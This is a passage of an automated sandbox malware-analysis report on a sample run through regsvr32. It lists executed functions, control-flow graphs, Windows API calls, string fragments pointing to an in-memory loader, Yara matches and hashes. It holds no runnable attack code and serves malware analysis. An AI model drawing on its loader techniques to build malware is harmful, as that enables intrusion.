16387->16384 16430 7fef9d28670 GetEnvironmentStringsW 16431 7fef9d28690 16430->16431 16432 7fef9d28697 WideCharToMultiByte 16430->16432 16434 7fef9d2875f FreeEnvironmentStringsW 16432->16434 16435 7fef9d28733 16432->16435 16434->16431 16435->16434 16436 7fef9d2876e WideCharToMultiByte 16435->16436 16437 7fef9d287c2 FreeEnvironmentStringsW 16436->16437 16438 7fef9d287aa 16436->16438 16437->16431 16438->16437 18076 7fef9d41370 18077 7fef9d3af60 _unlock_file2 2 API calls 18076->18077 18078 7fef9d41390 18077->18078 16639 7fef9d28860 HeapCreate 16640 7fef9d28891 GetVersion 16639->16640 16641 7fef9d2888d 16639->16641 16642 7fef9d288c1 16640->16642 16643 7fef9d288a7 HeapSetInformation 16640->16643 16642->16641 16643->16642 18079 7fef9d31b64 18080 7fef9d31b9d 18079->18080 18081 7fef9d31c86 18080->18081 18082 7fef9d3ab10 17 API calls 18080->18082 18083 7fef9d31bed 18080->18083 18081->18083 18084 7fef9d39290 23 API calls 18081->18084 18082->18081 18084->18083 18834 7fef9d35260 18835 7fef9d35296 __SehTransFilter _CreateFrameInfo 18834->18835 18836 7fef9d2ed30 _FindAndUnlinkFrame 36 API calls 18835->18836 18837 7fef9d353e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 18836->18837 18085 7fef9d41160 18088 7fef9d34e90 18085->18088 18087 7fef9d41179 18089 7fef9d34ecf 18088->18089 18090 7fef9d34ebb 18088->18090 18089->18087 18090->18089 18091 7fef9d2cf50 terminate 35 API calls 18090->18091 18091->18089 18099 7fef9d3bb66 18100 7fef9d3bb78 _CrtMemDumpAllObjectsSince wcsxfrm 18099->18100 18101 7fef9d3bc46 18100->18101 18103 7fef9d3b99c 18100->18103 18102 7fef9d2bd70 _invalid_parameter 17 API calls 18101->18102 18106 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18102->18106 18104 7fef9d3cc93 18103->18104 18108 7fef9d3bada 18103->18108 18105 7fef9d2bd70 _invalid_parameter 17 API calls 18104->18105 18104->18106 18105->18106 18107 7fef9d23280 __GSHandlerCheck 8 API calls 18106->18107 18109 7fef9d3cd90 18107->18109 18110 7fef9d2bd70 _invalid_parameter 17 API calls 18108->18110 18110->18106

                                Executed Functions

                                Function 000007FEF9D212B0 Relevance: 144.4, APIs: 6, Strings: 76, Instructions: 872memorywindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocAllocateExitFreeHeapLibraryLoadMessageProcessTaskVirtual
                                • String ID: :Pt$aZ.$!k}$"<t$"BQa$#sa{$$cb($$v"P$)*E$*p$+80Z$+sui$,'a$,kb($-~5$1+t$1>#J$1D4v$3/Q$4cg$9cnt$:-ZZ$?#$@kb($A+M$CwT>$GBQ+$N tW$N7#6$Pv5=$QS}5$Qp_*$Qv5$Qv}N$VqQS$[`$]=5[$^ir$_>zT$_>zT$a%"^$aQTH$b('x$b(/N$bkg2$c(kA$eMh$g(%"$gWQ>tTQv5MVM6qQS<jb(kAk%aQTGeMhH)59cj$hH)}$iAk%$kj$k%$b$k%a^$kW]>$o(fA$oRP$pNR`$pw ~$p0$q.$$t+)s$t/p$uTQ2$u'($werfault.exe$xT]v$}LhH$L`$@+*$L1&$S<j$aEy$w5M$|Oi$hH
                                • API String ID: 2181984824-2091011546
                                • Opcode ID: 1c06ffdaf7f78c717c8658d928c07ebd4f6ae3fbc6f84201f2b376329c5d69d0
                                • Instruction ID: bb29df52505e4adc914c7d7009f7ad667354b97652f73d457c5e5bdb89db6ee0
                                • Opcode Fuzzy Hash: 1c06ffdaf7f78c717c8658d928c07ebd4f6ae3fbc6f84201f2b376329c5d69d0
                                • Instruction Fuzzy Hash: 3FE2C8B250A7C18FE3748F66AE847DD3AA1F341748F609208C3991FA1DCB7A5255CF86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 002B0000 Relevance: 74.6, APIs: 4, Strings: 38, Instructions: 1094memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 15 2b0000-2b0460 call 2b0aa8 * 2 VirtualAlloc 37 2b048a-2b0494 15->37 38 2b0462-2b0466 15->38 41 2b049a-2b049e 37->41 42 2b0a91-2b0aa6 37->42 39 2b0468-2b0488 38->39 39->37 39->39 41->42 43 2b04a4-2b04a8 41->43 43->42 44 2b04ae-2b04b2 43->44 44->42 45 2b04b8-2b04bf 44->45 45->42 46 2b04c5-2b04d2 45->46 46->42 47 2b04d8-2b04e1 46->47 47->42 48 2b04e7-2b04f4 47->48 48->42 49 2b04fa-2b0507 48->49 50 2b0509-2b0511 49->50 51 2b0531-2b0567 GetNativeSystemInfo 49->51 52 2b0513-2b0518 50->52 51->42 53 2b056d-2b0589 VirtualAlloc 51->53 54 2b051a-2b051f 52->54 55 2b0521 52->55 56 2b058b-2b059e 53->56 57 2b05a0-2b05ac 53->57 58 2b0523-2b052f 54->58 55->58 56->57 59 2b05af-2b05b2 57->59 58->51 58->52 61 2b05c1-2b05db 59->61 62 2b05b4-2b05bf 59->62 63 2b061b-2b0622 61->63 64 2b05dd-2b05e2 61->64 62->59 66 2b06db-2b06e2 63->66 67 2b0628-2b062f 63->67 65 2b05e4-2b05ea 64->65 68 2b060b-2b0619 65->68 69 2b05ec-2b0609 65->69 71 2b06e8-2b06f9 66->71 72 2b0864-2b086b 66->72 67->66 70 2b0635-2b0642 67->70 68->63 68->65 69->68 69->69 70->66 75 2b0648-2b064f 70->75 76 2b0702-2b0705 71->76 73 2b0871-2b087f 72->73 74 2b0917-2b0929 72->74 79 2b090e-2b0911 73->79 77 2b092f-2b0937 74->77 78 2b0a07-2b0a1a 74->78 80 2b0654-2b0658 75->80 81 2b06fb-2b06ff 76->81 82 2b0707-2b070a 76->82 84 2b093b-2b093f 77->84 105 2b0a1c-2b0a27 78->105 106 2b0a40-2b0a4a 78->106 79->74 83 2b0884-2b08a9 79->83 85 2b06c0-2b06ca 80->85 81->76 86 2b0788-2b078e 82->86 87 2b070c-2b071d 82->87 110 2b08ab-2b08b1 83->110 111 2b0907-2b090c 83->111 91 2b09ec-2b09fa 84->91 92 2b0945-2b095a 84->92 89 2b065a-2b0669 85->89 90 2b06cc-2b06d2 85->90 88 2b0794-2b07a2 86->88 87->88 93 2b071f-2b0720 87->93 95 2b07a8 88->95 96 2b085d-2b085e 88->96 101 2b066b-2b0678 89->101 102 2b067a-2b067e 89->102 90->80 97 2b06d4-2b06d5 90->97 91->84 103 2b0a00-2b0a01 91->103 99 2b097b-2b097d 92->99 100 2b095c-2b095e 92->100 104 2b0722-2b0784 93->104 107 2b07ae-2b07d4 95->107 96->72 97->66 115 2b097f-2b0981 99->115 116 2b09a2-2b09a4 99->116 112 2b096e-2b0979 100->112 113 2b0960-2b096c 100->113 114 2b06bd-2b06be 101->114 117 2b068c-2b0690 102->117 118 2b0680-2b068a 102->118 103->78 104->104 119 2b0786 104->119 120 2b0a38-2b0a3e 105->120 108 2b0a7b-2b0a8e 106->108 109 2b0a4c-2b0a54 106->109 142 2b07d6-2b07d9 107->142 143 2b0835-2b0839 107->143 108->42 109->108 122 2b0a56-2b0a78 109->122 131 2b08bb-2b08c8 110->131 132 2b08b3-2b08b9 110->132 111->79 123 2b09be-2b09bf 112->123 113->123 114->85 124 2b0989-2b098b 115->124 125 2b0983-2b0987 115->125 129 2b09ac-2b09bb 116->129 130 2b09a6-2b09aa 116->130 127 2b0692-2b06a3 117->127 128 2b06a5-2b06a9 117->128 126 2b06b6-2b06ba 118->126 119->88 120->106 121 2b0a29-2b0a35 120->121 121->120 122->108 137 2b09c5-2b09cb 123->137 124->116 135 2b098d-2b098f 124->135 125->123 126->114 127->126 128->114 136 2b06ab-2b06b3 128->136 129->123 130->123 139 2b08ca-2b08d1 131->139 140 2b08d3-2b08e5 131->140 138 2b08ea-2b08fe 132->138 144 2b0999-2b09a0 135->144 145 2b0991-2b0997 135->145 136->126 146 2b09d9-2b09e9 VirtualProtect 137->146 147 2b09cd-2b09d3 137->147 138->111 153 2b0900-2b0905 138->153 139->139 139->140 140->138 149 2b07db-2b07e1 142->149 150 2b07e3-2b07f0 142->150 151 2b083b 143->151 152 2b0844-2b0850 143->152 144->137 145->123 146->91 147->146 154 2b0812-2b082c 149->154 155 2b07fb-2b080d 150->155 156 2b07f2-2b07f9 150->156 151->152 152->107 157 2b0856-2b0857 152->157 153->110 154->143 159 2b082e-2b0833 154->159 155->154 156->155 156->156 157->96 159->142
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926408165.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 002B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2b0000_regsvr32.jbxd
                                Similarity
                                • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                • API String ID: 2313188843-2517549848
                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                • Instruction ID: 0927d2af9352a1c10bb23b0ea1c64691f68e7e2c73622672a2ceb4e15a87d831
                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                • Instruction Fuzzy Hash: 2572D730628B498BDB29DF18C8856FAB7E1FB98345F10462DE8CBC7211DB34E556CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180011E5C Relevance: 8.0, Strings: 6, Instructions: 545COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 344 180011e5c-180011f0e call 1800153f4 347 180011f11-180011f17 344->347 348 18001228a-180012290 347->348 349 180011f1d 347->349 352 180012534-180012596 call 180025c30 348->352 353 180012296-18001229c 348->353 350 180011f23-180011f29 349->350 351 1800121da-180012280 call 180011ccc 349->351 354 1800121d0-1800121d5 350->354 355 180011f2f-180011f35 350->355 351->348 372 1800125a2 352->372 373 180012598-18001259d 352->373 358 1800122a2-1800122a8 353->358 359 180012449-180012525 call 180015ae0 353->359 354->347 360 1800125c4-180012680 call 180011ccc 355->360 361 180011f3b-180011f41 355->361 365 1800123f7-180012439 call 180025c30 358->365 366 1800122ae-1800122b4 358->366 371 18001252a-18001252f 359->371 378 180012685-1800126a5 360->378 369 1800121b6-1800121cb 361->369 370 180011f47-180011f4d 361->370 365->378 386 18001243f-180012444 365->386 374 1800125b3-1800125b9 366->374 375 1800122ba-1800123f2 call 18000a02c call 180011624 366->375 369->347 381 180011f53-180011f59 370->381 382 180012126-180012198 call 18001917c 370->382 383 180012115-180012121 371->383 376 1800125a7-1800125b0 372->376 373->383 374->378 379 1800125bf 374->379 375->376 376->374 379->347 381->374 387 180011f5f-1800120af call 18000bab8 381->387 389 18001219d-1800121b1 382->389 383->347 386->383 387->371 393 1800120b5-180012112 call 1800216e4 387->393 389->383 393->383
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :j$UI$UI$/$5$@u
                                • API String ID: 0-1744832406
                                • Opcode ID: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                • Instruction ID: 62cabd7460019d857fad8ef6802a9940dae2da1dd4c69d60ad9891f806a9e916
                                • Opcode Fuzzy Hash: d5fbd5fb42e64105118402a22ae1fd0938665267daf4f484be707b3cdea1b60d
                                • Instruction Fuzzy Hash: 35421971A1470EDFCB58DFA8C49A6EEBBF2FB44348F008159E806A7250DB719619CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180026F14 Relevance: 6.9, Strings: 5, Instructions: 675COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: F:^-$[9S$zUP$?'3$yc
                                • API String ID: 0-3875576172
                                • Opcode ID: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                • Instruction ID: acf5a29543b44a4ac2cab22a28fc6f208f1c2d96f0abb29e90a070f971d4b191
                                • Opcode Fuzzy Hash: 149e3d3d365d4ff99a41c49fe7a0ea6fd866fcc9ad2b25dafda07a3e1acf3aff
                                • Instruction Fuzzy Hash: 13720C7050038E8FDF49DF24C88A6DE3BA1FB68388F114619FC56962A1C7B4DA65CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180016320 Relevance: 6.4, Strings: 5, Instructions: 177COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 476 180016320-180016344 477 18001634b-180016350 476->477 478 180016546-18001657e call 180011624 477->478 479 180016356-18001635b 477->479 491 180016583-180016588 478->491 480 180016361-180016366 479->480 481 18001658f-1800165d0 call 180011624 479->481 484 18001636c-180016371 480->484 485 1800164ae-180016541 call 18001917c 480->485 487 1800165d5-1800165e1 481->487 488 180016411-180016493 call 18000cec4 484->488 489 180016377-18001637c 484->489 485->477 498 180016498-18001649e 488->498 493 1800163e9-1800163f7 489->493 494 18001637e-180016383 489->494 491->487 496 18001658a 491->496 497 1800163fd-180016401 493->497 499 180016385-18001638a 494->499 500 180016397-1800163e4 call 180008350 494->500 496->477 501 180016403-18001640c 497->501 502 1800163f9-1800163fa 497->502 498->487 503 1800164a4-1800164a9 498->503 499->491 504 180016390-180016395 499->504 500->477 501->477 502->497 503->477 504->477
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !$>]$>]$vM/${Wo
                                • API String ID: 0-1672528178
                                • Opcode ID: 3476f63b1fd483a3e4edb66e4c1250727eb216b571a6250b7c7aa87006e10f17
                                • Instruction ID: 47ac1da3a1e26fe678bf2a9ce2069fe56df1d0f6d245f307fc2b30da9b08538d
                                • Opcode Fuzzy Hash: 3476f63b1fd483a3e4edb66e4c1250727eb216b571a6250b7c7aa87006e10f17
                                • Instruction Fuzzy Hash: 5C81197051464CABDBE9DF28C8C9BDD3BA0FB58394F906119FD02862A0DB74D9C5CB81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180001378 Relevance: 5.4, Strings: 4, Instructions: 391COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %DcZ$L\`$u%$vr
                                • API String ID: 0-873403245
                                • Opcode ID: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                • Instruction ID: 7a4330a3d3912fed14e69a2d18b4041e28774fe6b527757d4cbe653c4a95fa98
                                • Opcode Fuzzy Hash: 2030f1da5196c9f476bb93962b4ebdec29646a183379a03d07fdefea4280d3e9
                                • Instruction Fuzzy Hash: 0912F47152068CDFCB8CDF28C88AADD7BA1FB48398F956219FD0A97250D774D984CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180001D58 Relevance: 5.3, Strings: 4, Instructions: 321COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 542 180001d58-180001d95 543 180001d9a 542->543 544 180001d9c-180001da2 543->544 545 180001da8-180001dae 544->545 546 18000248e 544->546 548 180001db4-180001dba 545->548 549 180002197-1800021a4 545->549 547 180002493-180002499 546->547 547->544 554 18000249f-1800024ac 547->554 550 180001e9b-18000201d call 18000eef4 call 1800196ec 548->550 551 180001dc0-180001dc6 548->551 552 1800021a6-1800021ac 549->552 553 1800021ae-1800021ca 549->553 568 180002024-18000218c call 1800196ec call 180008db0 550->568 569 18000201f 550->569 551->547 555 180001dcc-180001e8b call 18001c158 551->555 556 1800021d0-180002470 call 18001d014 call 1800196ec call 180008db0 552->556 553->556 555->554 564 180001e91-180001e96 555->564 572 180002475-18000247d 556->572 564->544 568->554 577 180002192 568->577 569->568 572->554 574 18000247f-180002489 572->574 574->544 577->543
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: .mZ$\$~V6k$%T
                                • API String ID: 0-3287852823
                                • Opcode ID: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                • Instruction ID: 166b9a2b8c7d7ea13ff64321e1c32e26f96a2e299ccb60065a18498a6503f561
                                • Opcode Fuzzy Hash: ccbc70a1b43ffc6d5414b274ff0ecbed60153be03e3051f192a6aa15e06d1cac
                                • Instruction Fuzzy Hash: 0402E8711013C8CBEBBECFA4D885BD97BA9FB44B44F10661AE84AAE250CBB45745CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D28860 Relevance: 4.5, APIs: 3, Instructions: 25memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 578 7fef9d28860-7fef9d2888b HeapCreate 579 7fef9d28891-7fef9d288a5 GetVersion 578->579 580 7fef9d2888d-7fef9d2888f 578->580 581 7fef9d288c1 579->581 582 7fef9d288a7-7fef9d288bb HeapSetInformation 579->582 583 7fef9d288c6-7fef9d288ca 580->583 581->583 582->581
                                APIs
                                • HeapCreate.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28876
                                • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D28891
                                • HeapSetInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D233C2), ref: 000007FEF9D288BB
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$CreateInformationVersion
                                • String ID:
                                • API String ID: 3563531100-0
                                • Opcode ID: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                • Instruction ID: 9235811b63a60011062a1442a231d54292fe2d432e51c42db702af6c27d11e97
                                • Opcode Fuzzy Hash: 48cf33cfee9be34a63005782b3e03b00dcbae59413766f72d2946869900c76f4
                                • Instruction Fuzzy Hash: 50F0FE74A18A4282F7949729AC0977E63D0B758345FA1C43696CD826B4DF3F9589C601
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002C6C8 Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                Download Yara Rule

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 078$GDo$}
                                • API String ID: 0-303245572
                                • Opcode ID: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                • Instruction ID: 0c94e6823936b68487d3afc04f5daf4118d9ac6b30c0afcc694cd4a40111a1d0
                                • Opcode Fuzzy Hash: 8956c442c33fd1cde17bd2344d54593dce01cac8c777ad426ea07fe8eec3f5fb
                                • Instruction Fuzzy Hash: 32D1CAB051A784AFC398DF28C1CA94BBBE0FB84754F906A1DF88686260D7B0D945CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180025C30 Relevance: 3.8, Strings: 3, Instructions: 79COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 599 180025c30-180025dae call 180010370 call 180015fb8
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: e@-0$f $wC
                                • API String ID: 0-2741453468
                                • Opcode ID: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                • Instruction ID: f8f9b13c1cb793f3116966172e7ed192e0f5529545d7cab8ca7c6d0d9d04acad
                                • Opcode Fuzzy Hash: 6e670c046987691f0a1e9af823784eece018238e228c51a72b7d39087d84c909
                                • Instruction Fuzzy Hash: E2319571518B848FD3A8DF28C48975ABBE1FB84344F608A1DE6DACB260DB709549CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002C2C8 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: L=`$rKS(
                                • API String ID: 0-4157335196
                                • Opcode ID: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                • Instruction ID: c6b4aee86e77721e5ec6a37c1ce5251b52915c7d30808e23b45806a77bf6ffc0
                                • Opcode Fuzzy Hash: 0ffd1ea2413f9b71380f5aeaf5e19bad7dcec336af59defbaf39c2d3ae1cfae5
                                • Instruction Fuzzy Hash: FD51BC705183848FC769DF29C18A64BBBF1FBC6784F108A1DE69A86261D772D909CF43
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180026410 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8h
                                • API String ID: 0-2787117397
                                • Opcode ID: d20b5c2dabe29708a31ba0e8275e2e5ac6bcf12f9e6970397621dbc27d768f27
                                • Instruction ID: eb392778bd881193a348804f8d52045fa41d3382a0d9eae0dd8f361f159f4541
                                • Opcode Fuzzy Hash: d20b5c2dabe29708a31ba0e8275e2e5ac6bcf12f9e6970397621dbc27d768f27
                                • Instruction Fuzzy Hash: 28D12E7060578C8FEBBADF24CC997DE3BA0FB49744F504219D88A8E260CB745B49CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D27640 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 290COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 160 7fef9d27640-7fef9d27671 GetStartupInfoW call 7fef9d24980 162 7fef9d27676-7fef9d27687 160->162 163 7fef9d27693-7fef9d276ac 162->163 164 7fef9d27689-7fef9d2768e 162->164 166 7fef9d276c2-7fef9d276d7 163->166 165 7fef9d27cee-7fef9d27cf5 164->165 167 7fef9d2777d-7fef9d27784 166->167 168 7fef9d276dd-7fef9d27778 166->168 170 7fef9d27ad6-7fef9d27afb 167->170 171 7fef9d2778a-7fef9d27790 167->171 168->166 174 7fef9d27b01-7fef9d27b2e 170->174 175 7fef9d27ce0-7fef9d27cec SetHandleCount 170->175 171->170 172 7fef9d27796-7fef9d277de 171->172 176 7fef9d277f0 172->176 177 7fef9d277e0-7fef9d277ee 172->177 178 7fef9d27b30-7fef9d27b3c 174->178 179 7fef9d27b42-7fef9d27b56 174->179 175->165 180 7fef9d277fb-7fef9d27833 176->180 177->180 178->179 181 7fef9d27cc0-7fef9d27cd8 178->181 182 7fef9d27b65-7fef9d27b6d 179->182 183 7fef9d27b58-7fef9d27b63 179->183 189 7fef9d27975-7fef9d279c7 180->189 190 7fef9d27839-7fef9d2786e call 7fef9d24980 180->190 185 7fef9d27cdb 181->185 186 7fef9d27b6f-7fef9d27b7a 182->186 187 7fef9d27b7c 182->187 188 7fef9d27b95-7fef9d27bb3 GetStdHandle 183->188 185->175 193 7fef9d27b87-7fef9d27b8e 186->193 187->193 194 7fef9d27c95-7fef9d27cb7 188->194 195 7fef9d27bb9-7fef9d27bc2 188->195 189->170 199 7fef9d279cd-7fef9d279d9 189->199 200 7fef9d27870-7fef9d2787d 190->200 201 7fef9d27882-7fef9d278ac 190->201 193->188 197 7fef9d27cbe 194->197 195->194 198 7fef9d27bc8-7fef9d27be5 GetFileType 195->198 197->185 198->194 202 7fef9d27beb-7fef9d27c0d 198->202 203 7fef9d27ad1 199->203 204 7fef9d279df-7fef9d279eb 199->204 200->189 205 7fef9d278c2-7fef9d278e3 201->205 206 7fef9d27c0f-7fef9d27c29 202->206 207 7fef9d27c2b-7fef9d27c3a 202->207 203->170 204->203 208 7fef9d279f1-7fef9d27a01 204->208 210 7fef9d27970 205->210 211 7fef9d278e9-7fef9d2796b 205->211 212 7fef9d27c56-7fef9d27c72 InitializeCriticalSectionAndSpinCount 206->212 207->212 213 7fef9d27c3c-7fef9d27c53 207->213 208->203 209 7fef9d27a07-7fef9d27a17 208->209 214 7fef9d27a32-7fef9d27aad InitializeCriticalSectionAndSpinCount 209->214 215 7fef9d27a19-7fef9d27a2c GetFileType 209->215 210->189 211->205 217 7fef9d27c74-7fef9d27c79 212->217 218 7fef9d27c7b-7fef9d27c93 212->218 213->212 219 7fef9d27aaf-7fef9d27ab4 214->219 220 7fef9d27ab9-7fef9d27ace 214->220 215->203 215->214 217->165 218->197 219->165 220->203
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _calloc_dbg$InfoStartup_calloc_dbg_impl
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                • API String ID: 1930727954-3864165772
                                • Opcode ID: ad15c381301d28b8263a0ad4c3d04fd02eedca4ba797fff4e6a56cbc154e2c0b
                                • Instruction ID: 04d5086f9a303f60624db38f474b136a55c048ce8eacbf8a5fedaf0ba48a359d
                                • Opcode Fuzzy Hash: ad15c381301d28b8263a0ad4c3d04fd02eedca4ba797fff4e6a56cbc154e2c0b
                                • Instruction Fuzzy Hash: DDF1D82260DBC5C9E7B08B19E88076EB7A0F385B64F258226CAED477E4DB3DD445CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D27DE0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 109COMMON
